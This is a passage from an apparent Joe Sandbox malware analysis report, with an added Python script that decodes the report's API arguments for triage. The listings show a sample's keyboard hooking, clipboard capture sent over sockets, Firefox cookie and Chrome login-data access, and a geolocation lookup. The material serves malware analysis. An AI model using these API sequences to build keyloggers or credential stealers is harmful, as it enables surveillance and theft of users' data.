                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                        • API String ID: 1164774033-405221262
                                                                                        • Opcode ID: d5ab99d5c8e703f78ba660c786112f6639adf047d7ea79dcf4c979a680208b30
                                                                                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                                        • Opcode Fuzzy Hash: d5ab99d5c8e703f78ba660c786112f6639adf047d7ea79dcf4c979a680208b30
                                                                                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
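Joe Sandbox prints integer arguments as raw hex, so the parameters that make the listings above meaningful (the `0000000D` clipboard format, the `00000002` passed to CreateToolhelp32Snapshot, the `00001000` and `00000400` OpenProcess access masks, the `00000004` handed to OpenSCManagerA and the `0000003B`/`00000003` pair handed to EnumServicesStatusW) have to be decoded by hand. The Python below is an added example, not Joe Sandbox tooling: it parses lines in the report's `Api.MODULE(args), ref: addr` format, maps those constants to their Win32 names, and flags the combination of GetClipboardData with a send() in the same call tree. It also decodes the SetWindowsHookEx hook id, since the low-level keyboard hook this report flags uses the same `0000000D` value (WH_KEYBOARD_LL) as the CF_UNICODETEXT clipboard format. The sample listings are copied from the clipboard, process-enumeration and service-enumeration blocks above.

```python
"""Decode the argument constants in Joe Sandbox "APIs" listings (the
"Api.MODULE(args), ref: addr" lines above) into Win32 names and behaviour
findings. Added example for this report; not Joe Sandbox's own code."""
import re
from dataclasses import dataclass

CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")

# Values from the Win32 SDK headers for the parameters decoded below.
CF_UNICODETEXT, TH32CS_SNAPPROCESS, WH_KEYBOARD_LL = 13, 0x2, 13
SERVICE_STATE_ALL, SC_MANAGER_ENUMERATE_SERVICE = 0x3, 0x4
PROCESS_ACCESS = {0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
SERVICE_TYPE = {0x01: "SERVICE_KERNEL_DRIVER", 0x02: "SERVICE_FILE_SYSTEM_DRIVER",
                0x08: "SERVICE_RECOGNIZER_DRIVER", 0x10: "SERVICE_WIN32_OWN_PROCESS",
                0x20: "SERVICE_WIN32_SHARE_PROCESS"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: str = ""   # caller address when the line reads "Part of subcall function"


def parse_calls(block: str) -> list:
    calls = []
    for line in block.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = m["args"] or ""           # calls with no visible arguments print no parentheses
        args = [a.strip() for a in raw.split(",")] if raw.strip() else []
        calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"] or ""))
    return calls


def arg_int(arg: str):
    """Joe Sandbox prints known integers as 8 hex digits; '?' and string arguments stay None."""
    return int(arg, 16) if HEX8.fullmatch(arg) else None


def decode_flags(value: int, table: dict) -> tuple:
    """Split a bitmask into named flags plus any bits the table does not know."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    return names, value & ~known


def triage(block: str) -> list:
    """One finding per security-relevant call, plus cross-call observations."""
    calls = parse_calls(block)
    apis = {c.api for c in calls}
    out = []
    for c in calls:
        a = [arg_int(x) for x in c.args]
        if c.api.startswith("SetWindowsHookEx") and a[:1] == [WH_KEYBOARD_LL]:
            out.append(f"{c.ref} {c.api}(WH_KEYBOARD_LL): low-level keyboard hook")
        elif c.api == "GetClipboardData" and a[:1] == [CF_UNICODETEXT]:
            out.append(f"{c.ref} GetClipboardData(CF_UNICODETEXT): reads clipboard text")
        elif c.api == "CreateToolhelp32Snapshot" and a[:1] == [TH32CS_SNAPPROCESS]:
            out.append(f"{c.ref} CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS): enumerates processes")
        elif c.api == "OpenProcess" and a and a[0] is not None:
            names, rest = decode_flags(a[0], PROCESS_ACCESS)
            extra = f"|{rest:#x}" if rest else ""
            out.append(f"{c.ref} OpenProcess({'|'.join(names)}{extra})")
        elif c.api == "OpenSCManagerA" and len(a) > 2 and a[2] == SC_MANAGER_ENUMERATE_SERVICE:
            out.append(f"{c.ref} OpenSCManagerA(SC_MANAGER_ENUMERATE_SERVICE)")
        elif c.api.startswith("EnumServicesStatus") and len(a) > 2 and a[1] is not None:
            names, _ = decode_flags(a[1], SERVICE_TYPE)
            state = "SERVICE_STATE_ALL" if a[2] == SERVICE_STATE_ALL else str(a[2])
            out.append(f"{c.ref} {c.api}(type={'|'.join(names)}, state={state})")
    if "GetClipboardData" in apis and "send" in apis:
        out.append("clipboard text reaches a WS2_32 send() in this function's call tree")
    return out


# Listings copied from the function blocks above (clipboard, process enumeration, services).
CLIPBOARD_BLOCK = """
• OpenClipboard.USER32 ref: 0041695C
• GetClipboardData.USER32(0000000D), ref: 0041696C
• CloseClipboard.USER32 ref: 00416984
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
"""
PROCESS_BLOCK = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
"""
SERVICES_BLOCK = """
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
• GetLastError.KERNEL32 ref: 0041A7BB
"""


def demo() -> dict:
    return {name: triage(block) for name, block in
            [("clipboard", CLIPBOARD_BLOCK), ("process", PROCESS_BLOCK), ("services", SERVICES_BLOCK)]}
```

Index arguments by the documented parameter position, not by the count shown: the listing prints raw stack slots, so OpenSCManagerA appears with four arguments although the API takes three, and the access mask is still the third. The two OpenProcess calls decode to query-only rights, which fits a target-selection loop over the snapshot (the block's strings name `ieinstal.exe` and `ielowutil.exe`) rather than the injection itself.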

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                                                                        • DispatchMessageA.USER32(?), ref: 0040A355
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                        • String ID: Keylogger initialization failure: error $`#v
                                                                                        • API String ID: 3219506041-3226811161
                                                                                        • Opcode ID: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                                                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                                        • Opcode Fuzzy Hash: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                                                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                        • String ID:
                                                                                        • API String ID: 2341273852-0
                                                                                        • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                                                                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                                        • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                                                                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Find$CreateFirstNext
                                                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                                                        • API String ID: 341183262-3812160132
                                                                                        • Opcode ID: bef3662a98f203fd8959110ad3b8c393325e7dbc5807a61bff8cf10b28a3f201
                                                                                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                                        • Opcode Fuzzy Hash: bef3662a98f203fd8959110ad3b8c393325e7dbc5807a61bff8cf10b28a3f201
                                                                                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 0040A416
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                        • GetKeyState.USER32(00000010), ref: 0040A433
                                                                                        • GetKeyboardState.USER32(?), ref: 0040A43E
                                                                                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 1888522110-0
                                                                                        • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                                                                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                                        • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                                                                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                        • API String ID: 2127411465-314212984
                                                                                        • Opcode ID: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                                                                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                                        • Opcode Fuzzy Hash: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                                                                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00449212
                                                                                        • _free.LIBCMT ref: 00449236
                                                                                        • _free.LIBCMT ref: 004493BD
                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                        • _free.LIBCMT ref: 00449589
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                        • String ID:
                                                                                        • API String ID: 314583886-0
                                                                                        • Opcode ID: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                                                                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                                        • Opcode Fuzzy Hash: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                                                                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                        • API String ID: 1589313981-2876530381
                                                                                        • Opcode ID: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                                                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                                        • Opcode Fuzzy Hash: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                                                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID: ACP$OCP$['E
                                                                                        • API String ID: 2299586839-2532616801
                                                                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                                        Strings
                                                                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                        • API String ID: 3121278467-91888290
                                                                                        • Opcode ID: 4da1b85d2ea56bad142503f0f1c0f54d6a8de9b2ae8113808786c7ddc0b742be
                                                                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                                        • Opcode Fuzzy Hash: 4da1b85d2ea56bad142503f0f1c0f54d6a8de9b2ae8113808786c7ddc0b742be
                                                                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
• GetLastError.KERNEL32 ref: 0040BA58
Strings
• UserProfile, xrefs: 0040BA1E
• [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
• [Chrome StoredLogins not found], xrefs: 0040BA72
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
• Opcode ID: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
• Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
• Opcode Fuzzy Hash: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
• Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
• OpenProcessToken.ADVAPI32(00000000), ref: 00417966
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
• GetLastError.KERNEL32 ref: 0041799D
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
• Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
• Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
• Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00409258
  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
• FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
• FindClose.KERNEL32(00000000), ref: 004093C1
  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
  • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000), ref: 00404E43
  • Part of subcall function 00404E26: CloseHandle.KERNEL32(00000000), ref: 00404E4C
• FindClose.KERNEL32(00000000), ref: 004095B9
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
• String ID:
• API String ID: 1824512719-0
• Opcode ID: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
• Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
• Opcode Fuzzy Hash: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
• Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
• CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
• CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
